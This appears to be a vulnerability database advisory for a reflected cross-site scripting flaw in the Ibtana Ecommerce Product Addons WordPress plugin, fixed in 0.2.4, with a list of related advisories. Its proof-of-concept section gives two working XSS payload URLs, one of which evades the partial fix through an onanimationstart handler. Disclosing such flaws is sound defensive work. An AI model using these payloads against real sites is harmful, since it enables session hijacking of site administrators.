Ibtana – Ecommerce Product Addons < 0.2.4 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape some user input before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues.

Proof of Concept

v < 0.2.2 - https://example.com/wp-admin/admin.php?page=ibtana-custom-post-type&posttype_id="><script>alert(/XSS/)</script>

v < 0.2.4 - https://example.com/wp-admin/admin.php?page=ibtana-custom-post-type&posttype_id="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

Affects Plugins

ibtana-ecommerce-product-addons

Fixed in 0.2.4

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

c33e0c8f-e870-417e-af32-e816d6eaf835

Timeline

Publicly Published

2021-11-01 (about 4 years ago)

Added

2021-11-01 (about 4 years ago)

Last Updated

2021-11-01 (about 4 years ago)

Other

Published

Title

Published

2025-12-17

Title

Embed Any Document < 2.7.11 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

Terillion Reviews < 1.2 - Profile Id Field XSS

Published

2025-12-12

Title

MarqueeAddons < 3.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Testimonial Marquee Widget

Published

2021-01-11

Title

Custom Global Variables < 1.1.1 - Stored Cross-Site Scripting (XSS)

Published

2024-11-22

Title

Chessgame Shizzle < 1.3.1 - Reflected Cross-Site Scripting